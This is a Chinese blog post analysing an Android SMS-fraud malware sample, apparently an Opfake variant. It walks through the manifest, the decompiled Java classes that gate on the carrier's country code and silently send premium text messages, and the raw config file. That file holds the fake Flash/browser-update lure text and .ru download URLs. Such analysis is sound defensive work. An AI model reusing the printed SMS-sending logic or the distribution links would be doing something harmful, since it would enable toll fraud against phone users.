`

android恶意程序分析 (四)

 
阅读更多

这次分析的依然是opfake的一个变种,但实际分析下来,感觉这个不太像,内容也是比较怪异的。

亮点不多

 

写道
Opfake 另一个变种?
1. AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="1" android:versionName="1.0" package="com.software.installer"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="5" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.SEND_SMS" />
<application android:label="@string/app_name" android:icon="@drawable/icon" android:debuggable="true">
<receiver android:name=".Notifier">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
<category android:name="android.intent.category.HOME" />
</intent-filter>
</receiver>
<activity android:label="@string/app_name" android:name=".Main" android:configChanges="keyboardHidden|orientation">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name=".Offert" />
<activity android:name=".GrantAccess" />
</application>
</manifest>

权限上可疑的地方不多,大致有访问互联网,发短信,外部存储,读取device id,虽然请求少,但是都是比较关键的权限,估计这个有下载器的感觉。


2 。类分析
从Main开始
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130903041);
Notifier localNotifier = new Notifier();
//设置preference的文件
localNotifier.setPrefs(getSharedPreferences("PREFERENCES", 0));
//下面这个function就是比较重要的了 ,他从raw资源中读取了一些东西,我们也从中发现了可疑的raw配置文件act_schemes.cfg(最后有),他从中读取了第9行的一个3,并保存到了PREFERENCES.xml中NOTIFICATION_NUMBER localNotifier.initNotificationsNumberSettings(getApplicationContext());
this.progressBar = ((ProgressBar)findViewById(2131296259));
this.pleaseWaitString = getResources().getString(2131165191);
//actor类,
this.actor = new Actor(this);
//实质是国家是否匹配上
if (!this.actor.wasInitError())
{//中间会调用init()方法,方法中大量的混杂初始一些hashmap以及数字字符串。
initSettings();
//这个会true,因为前面代码中会设置
if (this.actor.sendImmediately())
{
initGUI();
if (!this.actor.isActed())
//核心的一个方法
startAct();
}
}
while (true)
{
return;
startLoading();
continue;
if (this.actor.isActed())
{
showLink();
continue;
}
initGUI();
startLoading();
continue;
finish();
}
}


Actor类构造方法

public Actor(Context paramContext)
{
this.mContext = paramContext;
this.mgr = ((TelephonyManager)this.mContext.getSystemService("phone"));
this.currentOp = this.mgr.getNetworkOperator();
this.settings = this.mContext.getSharedPreferences("PREFERENCES", 0);
// initInformation的实质是对currentOp字符串分割
// this.countryCode = this.currentOp.substring(0, 3);
// this.operatorCode = this.currentOp.substring(3, 5);
initInformation();
//实现在后面
initDataFromConfigs();
//又是国家判断,后面有分析
if (isMGF())
{// this.texts在initDataFromConfigs已经初始化了,这句也比较好理解,应该是对应的这段xml的赋值
<countryTag>
<mcc value="02" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>

this.firstText = ((String)((HashMap)this.texts.get("02")).get("firstString"));
this.installedText = ((String)((HashMap)this.texts.get("02")).get("installedText"));
}
while (true)
{//利用stringBuilder构造了好些字符串并放到了一个hash中,
init();
return;
//这句应该是判断国家的,通过countryCode来得到对应的国家,再去countries.xml中找对应的内容
if ((isRFID()) || (isUkraineID()) || (isKZID()))
{
this.firstText = ((String)((HashMap)this.texts.get(this.countryCode)).get("firstString"));
this.installedText = ((String)((HashMap)this.texts.get(this.countryCode)).get("installedText"));
continue;
}
//这应该是默认的填上这些,如果前面的没匹配到。
this.firstText = ((String)((HashMap)this.texts.get("100000")).get("firstString"));
this.installedText = ((String)((HashMap)this.texts.get("100000")).get("installedText"));
if (this.firstText != null)
continue;
this.firstText = ((String)((HashMap)this.texts.get("250")).get("firstString"));
this.installedText = ((String)((HashMap)this.texts.get("250")).get("installedText"));
}
}

private void initDataFromConfigs()
{
try
{//这句代码实质是去可疑raw文件act_schemes.cfg,的第四第五行读取,并做成了一个Pair<String, String>返回实质就是<” 29”,” 4205+29536+d+a”>
this.schemes = TextUtils.getCodeAndPrefix(this.mContext);
CURRENT_SCHEME = (String)this.schemes.first;
try
{
//这句中又发现了一个可疑的xml文件countries.xml,它具体内容在后面,干嘛用的还不清楚,(应该是不同国家的一些区别吧,)
label24: this.texts = TextUtils.getStringsForCountries(this.mContext);
label35: this.app_name = new String();
try
{
//读取了文件act_schemes.cfg的第一行:adobe-flash-player-android
this.app_name = TextUtils.getContentName(this.mContext);
label57: this.content = new String();
try
{
//读取了文件act_schemes.cfg的第二行:http://androidosoft.ru/engine/download.php?id=38
this.content = TextUtils.getURL(this.mContext);
try
{
//这里应该是判断国家的地方通过前面得到的 this.countryCode==250 this.operatorCode=02来判断的,明显我的模拟器这里会失败,估计是只有俄罗斯境内这个才能支持吧
label79: if (isMGF())
this.sendImmediately = false;
else
//这里又读取了另一个字符串还是那个raw文件中的第三行999 ,所以这里判断就是sendImmediately=true
this.sendImmediately =
TextUtils.privateMark(this.mContext).equals("999");

}

private void startAct()
{
this.dialog = new ProgressDialog(this);
this.dialog.setMessage(this.pleaseWaitString);
this.dialog.setCancelable(false);
this.dialog.show();
registerReceiver();
//核心
this.actor.activate();
}

public void activate()
{
initReceiver();
new Sender(this.mContext, (Scheme)this.actSchemes.get(CURRENT_SCHEME), (String)this.schemes.second, this.countryCode, this.operatorCode).send();
}

public Sender(Context paramContext, Scheme paramScheme, String paramString1, String paramString2, String paramString3)
{
this.mContext = paramContext;
this.actScheme = paramScheme;
this.smsData = paramString1;
}

public void send()
{
PendingIntent localPendingIntent = PendingIntent.getBroadcast(this.mContext, 0, new Intent("SENT"), 0);
SmsManager localSmsManager = SmsManager.getDefault();
int i = this.actScheme.list.size();
if (i > 0);
for (int j = 0; ; j++)
{
if (j >= i)
return;
String str = (String)((Pair)this.actScheme.list.get(j)).second + "+" + this.smsData;
//发送短信指定内容,到指定内容this.smsData是4205+29536+d+a,这个是前面的initDataFromConfigs中从raw文件中读取的, actScheme这个则是init那个方法处理的一些数字字符串,功能不详,估计是要发送的号码之类的,比较难懂
localSmsManager.sendTextMessage((String)((Pair)this.actScheme.list.get(j)).first, null, str, localPendingIntent, null);
}
}
}




3.亮点
A.raw资源还是比较关键的部分,很多恶意软件都在raw资源中留下了线索,像这个就是raw中有act_schemes.cfg内容一看就不太对头
adobe-flash-player-android
http://androidosoft.ru/engine/download.php?id=38
999
29
4205+29536+d+a
Критичное обновление
Доступно срочное обновление браузера
http://nashimarket.ru/update/b/?s=4205&a=29
此外还有个可疑的xml文件:countries.xml
<?xml version="1.0" encoding="utf-8"?>
<countriesTag>
<countryTag>
<mcc value="250" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
<countryTag>
<mcc value="401" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
<countryTag>
<mcc value="255" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
<countryTag>
<mcc value="02" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
<countryTag>
<mcc value="100000" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
</countriesTag>

B.这个恶意软件对不同的国家进行了不同的处理,通过
mgr =((TelephonyManager)this.mContext.getSystemService("phone"));
this.currentOp = this.mgr.getNetworkOperator();
this.settings = this.mContext.getSharedPreferences("PREFERENCES", 0);
// initInformation的实质是对currentOp字符串分割
// this.countryCode = this.currentOp.substring(0, 3);
// this.operatorCode = this.currentOp.substring(3, 5);
获得本机的国家编码,在对应的配置文件xml中来做相应的处理。

C,init()采用了StringBuilder来动态的生成string,有可能是以后对抗恶意代码检测的一个手段吧。

D 感觉像是一个未完成的东西,实质上的危害只有发送短信一个功能,而且内容都是实现指定好的,感觉上比较凌乱

 

分享到:
评论

相关推荐

    基于textCNN模型的Android恶意程序检测.pdf

    在Android恶意程序检测中,textCNN模型被用来识别和分析应用程序的行为特征,从而判断其是否具有恶意行为。 首先,该方法采用了多种触发机制,目的是从不同层面诱导并暴露潜在的恶意行为。这些触发机制可以模拟用户...

    Android恶意程序常用权限分析及统计研究.pdf

    【Android恶意程序常用权限分析及统计研究】 在Android操作系统中,应用权限是保障用户隐私和系统安全的关键机制。然而,一些恶意程序会滥用这些权限,对用户数据和系统造成威胁。这篇研究论文针对这一问题,深入...

    Android Malware and Analysis (android恶意软件分析)

    手机等移动设备上存储的敏感信息越来越多,同时这些设备提供的恶意软件保护却相对有限,这直接导致了对安全专家的即时需求,这些专家需要了解如何应对Android恶意软件威胁及其分析。本文将基于《Android Malware and...

    基于云计算的Android恶意程序协同检测系统.pdf

    Android恶意程序检测主要通过特征码匹配和行为分析两种方式。在本系统中,检测机制首先将待检测的Android应用与特征库中的特征码进行匹配。如果应用中的特征码与特征库中的某个恶意程序特征码匹配成功,系统将直接...

    基于ICC的Android恶意程序检测方法.pdf

    【Android恶意程序检测方法概述】 Android恶意程序检测是网络安全领域中的一个重要课题,因为随着智能手机的广泛使用,Android系统的安全问题日益突出。据统计,大约85%的手机采用Android系统,因此,确保Android...

    Android恶意代码的逆向分析.pdf

    Android恶意代码的逆向分析.pdf Android 恶意代码的逆向分析是当前 Android 安全领域中的一项重要研究方向。本文主要研究基于逆向工程的 Android 应用程序中恶意代码的分析方法。该方法首先通过逆向工程获取 ...

    一种Android恶意程序检测工具的实现.pdf

    标题中的“一种Android恶意程序检测工具的实现”指的是在Android操作系统上设计和实现一种用于检测恶意应用程序的工具。描述中提到,目前针对Android平台的恶意程序识别主要依赖静态检测,但这种方法的识别率并不高...

    android恶意程序分析 (三)

    NULL 博文链接:https://wcf1987.iteye.com/blog/1480507

    Android-Droidefense:高级的Android恶意软件分析框架

    **Android-Droidefense: 高级的Android恶意软件分析框架** 在移动安全领域,尤其是在Android平台上,恶意软件分析是至关重要的。Android-Droidefence是一个专门为Android恶意软件设计的高级分析框架,它旨在帮助...

    Android平台下恶意软件分析与检测.pdf

    总的来说,这篇论文提供了一种创新的Android恶意软件检测策略,强调了结合权限和API行为的特征分析在提高检测准确性和效率方面的重要性。这对于Android应用开发者、安全研究人员以及普通用户来说,都是一个宝贵的...

    一种基于行为分析的Android系统恶意程序检测模型.pdf

    总的来说,基于行为分析的Android系统恶意程序检测模型是应对当前移动安全挑战的重要手段。通过深入理解和分析程序行为,可以及时发现并阻止恶意行为,保护用户隐私和设备安全,同时也为未来的移动安全研究提供了新...

    让你睡不着觉的 Android 恶意软件

    该网站汇集了大量的 Android 恶意软件样本,并对其进行了分类、分析和归档,为安全研究人员提供了宝贵的数据资源。 #### 四、深入探讨:AndroidManifest.xml 的秘密 ##### 1. AndroidManifest.xml 的非 XML 特性 ...

Global site tag (gtag.js) - Google Analytics